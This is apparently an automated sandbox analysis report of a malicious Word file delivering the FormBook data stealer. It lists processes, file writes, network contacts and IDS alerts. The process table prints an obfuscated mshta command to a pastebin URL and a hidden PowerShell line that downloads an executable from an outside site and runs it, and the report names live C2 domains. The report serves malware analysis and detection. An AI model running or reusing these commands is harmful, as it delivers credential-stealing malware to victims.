File name: | sample_mal.doc |
Full analysis: | https://app.any.run/tasks/a2e2dcce-a23e-4735-8a12-2149d12c6d7d |
Verdict: | Malicious activity |
Threats: | FormBook is a data stealer that is being distributed as a MaaS. FormBook differs from a lot of competing malware by its extreme ease of use that allows even the unexperienced threat actors to use FormBook virus. |
Analysis date: | January 22, 2019, 12:32:16 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/octet-stream |
File info: | data |
MD5: | 0541E771C448433E3637A1B504F109A9 |
SHA1: | 49B2E9EEE0BEB213E0C70922AAFD02609397D3FD |
SHA256: | A5F2A4EAF3368AF7F3C1E16B9C8EC81C31DC4C3C0E059D424B307E37DE3CAD6B |
SSDEEP: | 192:MQnFaO6cQI1wYk/zNT6Hk3B1977HI7BtHr8W/KHxRF:MQFxiA/c4E3T977HI7Bb+b |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3008 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\sample_mal.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3376 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | svchost.exe | |
User: admin Company: Design Science, Inc. Integrity Level: MEDIUM Description: Microsoft Equation Editor Exit code: 0 Version: 00110900 | ||||
4056 | cMd /C mS^Ht^a ht^tp^s:^/^/pastebin.com/raw/rexh3Np9 | C:\Windows\system32\cMd.exe | — | EQNEDT32.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2512 | mSHta https://pastebin.com/raw/rexh3Np9 | C:\Windows\system32\mshta.exe | cMd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
2840 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://www.tibetsaveandcare.org/sites/default/files/cast5.exe',$env:Temp+'\DOZQYX.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\DOZQYX.Exe') | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | mshta.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3252 | "C:\Users\admin\AppData\Local\Temp\DOZQYX.Exe" | C:\Users\admin\AppData\Local\Temp\DOZQYX.Exe | — | powershell.exe |
User: admin Company: lavangai Integrity Level: MEDIUM Description: STUCKUP5 Exit code: 0 Version: 9.07.0007 | ||||
3928 | C:\Users\admin\AppData\Local\Temp\DOZQYX.Exe" | C:\Users\admin\AppData\Local\Temp\DOZQYX.Exe | — | DOZQYX.Exe |
User: admin Company: lavangai Integrity Level: MEDIUM Description: STUCKUP5 Exit code: 0 Version: 9.07.0007 | ||||
2700 | "C:\Windows\System32\mstsc.exe" | C:\Windows\System32\mstsc.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Remote Desktop Connection Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
624 | /c del "C:\Users\admin\AppData\Local\Temp\DOZQYX.Exe" | C:\Windows\System32\cmd.exe | — | mstsc.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
284 | C:\Windows\Explorer.EXE | C:\Windows\explorer.exe | — | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3008 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRE9A8.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2840 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PTFJ7W9AKXIFJGJIG3EW.temp | — | |
MD5:— | SHA256:— | |||
2512 | mshta.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@pastebin[1].txt | text | |
MD5:08E85D75A918A5B7A9B06165DA7FB1D5 | SHA256:1B064D51A7793049542C5C2C76DAE9B5E93E78C9F93387BB0AC27BDBE314BDA4 | |||
3008 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$mple_mal.doc | pgc | |
MD5:2FA05FB8E7EAEB3E8B254201D45B8BE3 | SHA256:9E25B585B23BB64C3B2277FBFB96E3C9C4832D4E18F8BDD9FA4095D839AAB2CF | |||
2700 | mstsc.exe | C:\Users\admin\AppData\Roaming\NKR2RS2E\NKRlogrc.ini | binary | |
MD5:2855A82ECDD565B4D957EC2EE05AED26 | SHA256:88E38DA5B12DD96AFD9DC90C79929EC31D8604B1AFDEBDD5A02B19249C08C939 | |||
3252 | DOZQYX.Exe | C:\Users\admin\AppData\Local\Temp\~DFFAB2D9E9D9726023.TMP | binary | |
MD5:84216C8C9312EF8E828448A551119147 | SHA256:8C80B029009D46934858735857A0D63713D2B0F6FE9B21046AA3C33819A979D7 | |||
2840 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8 | SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 | |||
2840 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20f699.TMP | binary | |
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8 | SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 | |||
2840 | powershell.exe | C:\Users\admin\AppData\Local\Temp\DOZQYX.Exe | executable | |
MD5:DD30142BE987B662B59A34C43C50FDE2 | SHA256:D1F8459EC183997702AC7D0701D9C486491B5C2B376EC5AC26AB8DBD25BCF09B | |||
2512 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\rexh3Np9[1].txt | html | |
MD5:5842327F74F0136CD39606D1B4C40425 | SHA256:743C8C08268205161A9E38511DEE0C9182FD261F36CB46C87755A85E4B35CD9E |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
284 | explorer.exe | POST | — | 23.20.239.12:80 | http://www.szsjwz.com/ca/ | US | — | — | shared |
284 | explorer.exe | GET | 302 | 23.20.239.12:80 | http://www.szsjwz.com/ca/?WP3DU=A0+e4gRR7l3Ab/rHoGJioPqDLFDqe1RqdgZSad3mEmB8fG+UhHVI0sRgJ7HnOx5lXXl/bw==&MZnHw=aTZxDHLhEDudWJIp&sql=1 | US | html | 182 b | shared |
284 | explorer.exe | POST | — | 23.20.239.12:80 | http://www.szsjwz.com/ca/ | US | — | — | shared |
284 | explorer.exe | POST | — | 188.93.150.83:80 | http://www.electrichairdressing.com/ca/ | NL | — | — | malicious |
2840 | powershell.exe | GET | 200 | 213.186.33.40:80 | http://www.tibetsaveandcare.org/sites/default/files/cast5.exe | FR | executable | 554 Kb | malicious |
284 | explorer.exe | POST | — | 188.93.150.83:80 | http://www.electrichairdressing.com/ca/ | NL | — | — | malicious |
284 | explorer.exe | POST | — | 188.93.150.83:80 | http://www.electrichairdressing.com/ca/ | NL | — | — | malicious |
284 | explorer.exe | POST | — | 23.20.239.12:80 | http://www.szsjwz.com/ca/ | US | — | — | shared |
284 | explorer.exe | POST | — | 66.254.168.221:80 | http://www.shitian-cctv.com/ca/ | US | — | — | malicious |
284 | explorer.exe | GET | 200 | 104.221.130.44:80 | http://www.qjfc168.com/ca/?WP3DU=8OJdzd2e2tr8FG7Zyte2q8EMSnyWIX3J5Bt9TKXN23Cw2Y7Y4HOiCEYrsfANUh/WmDD5Gg==&MZnHw=aTZxDHLhEDudWJIp | US | text | 201 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2512 | mshta.exe | 104.20.209.21:443 | pastebin.com | Cloudflare Inc | US | shared |
284 | explorer.exe | 104.221.130.44:80 | www.qjfc168.com | eSited Solutions | US | suspicious |
2840 | powershell.exe | 213.186.33.40:80 | www.tibetsaveandcare.org | OVH SAS | FR | malicious |
284 | explorer.exe | 23.20.239.12:80 | www.szsjwz.com | Amazon.com, Inc. | US | shared |
284 | explorer.exe | 66.254.168.221:80 | www.shitian-cctv.com | eSited Solutions | US | malicious |
284 | explorer.exe | 188.93.150.83:80 | www.electrichairdressing.com | mijndomein.nl BV | NL | malicious |
284 | explorer.exe | 199.192.27.169:80 | www.umbeatyn.com | — | US | malicious |
284 | explorer.exe | 52.79.141.193:80 | www.korean-lab.com | Amazon.com, Inc. | KR | suspicious |
Domain | IP | Reputation |
---|---|---|
pastebin.com |
| shared |
www.tibetsaveandcare.org |
| malicious |
www.qjfc168.com |
| malicious |
www.lifestylebuilderonline.net |
| unknown |
www.szsjwz.com |
| shared |
www.electrichairdressing.com |
| malicious |
www.umbeatyn.com |
| malicious |
www.dispensedcannabis.com |
| unknown |
www.shitian-cctv.com |
| malicious |
www.jikepabgi.loan |
| unknown |
PID | Process | Class | Message |
---|---|---|---|
2840 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2840 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
284 | explorer.exe | A Network Trojan was detected | SC SPYWARE Trojan-Spy.Win32.Noon |
284 | explorer.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious HTTP-GET request with body and minimal header |
284 | explorer.exe | A Network Trojan was detected | MALWARE [PTsecurity] FormBook CnC Checkin (GET) |
284 | explorer.exe | A Network Trojan was detected | SC SPYWARE Trojan-Spy.Win32.Noon |
284 | explorer.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious HTTP-GET request with body and minimal header |
284 | explorer.exe | A Network Trojan was detected | MALWARE [PTsecurity] FormBook CnC Checkin (GET) |
284 | explorer.exe | A Network Trojan was detected | MALWARE [PTsecurity] TrojanSpy:FormBook CnC Checkin (POST) |
284 | explorer.exe | A Network Trojan was detected | MALWARE [PTsecurity] FormBook CnC Checkin (POST) |